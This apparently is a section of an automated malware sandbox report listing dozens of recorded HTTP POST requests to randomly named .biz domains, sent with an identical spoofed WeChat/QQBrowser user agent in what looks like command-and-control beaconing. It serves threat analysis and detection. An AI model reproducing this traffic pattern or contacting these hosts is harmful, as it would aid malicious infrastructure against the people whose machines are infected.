              Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pboamknl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mfuaeqrjbxmv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /nxbumxilirhmvku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /jaumpxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ptbejgswjfxl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xgterudimsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /mitdmmperwbt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /pyts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ovcqqvbb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xphvd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /hpbkng HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qmkllgvo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ouftojym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kaxtgyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dpntwbnivmh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mshoclxftgdlbsbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /cxtsujgx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ryysvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lihflvfpneg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ihixrfcnmctn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bsskdfvqijpyfnid HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dxsssktqcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /gdfpfuufvopwu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qgorjabxoa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /weir HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /xg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hrvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /bc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hqdytjqsnbt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /bssxxkwdr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /t HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jweaqenrkqbo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fehxmtmgeeq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /aya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /sopra HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /aaxb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /tw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /yp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ncst HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ej HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ccheohdfgxjtt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /eevmjkkfks HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jqkpdrugusyff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ktcaihfarwj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jqu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yhqqc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ctr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rjfjacxyvik HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mnjmhp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /snachosinlefnrw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rokvfxqf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: opowhhece.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /fkc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jdhhbs.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /rkgoodhecptjykcl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kitlgdtf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gpuqtdsdsmc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mgmsclkyu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ieicusmwh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: brsua.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hhgppons HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: warkcdu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /lcarfqhjjqwitg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dlynankz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gvodnknqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gcedd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /vvlfkuqn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oflybfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
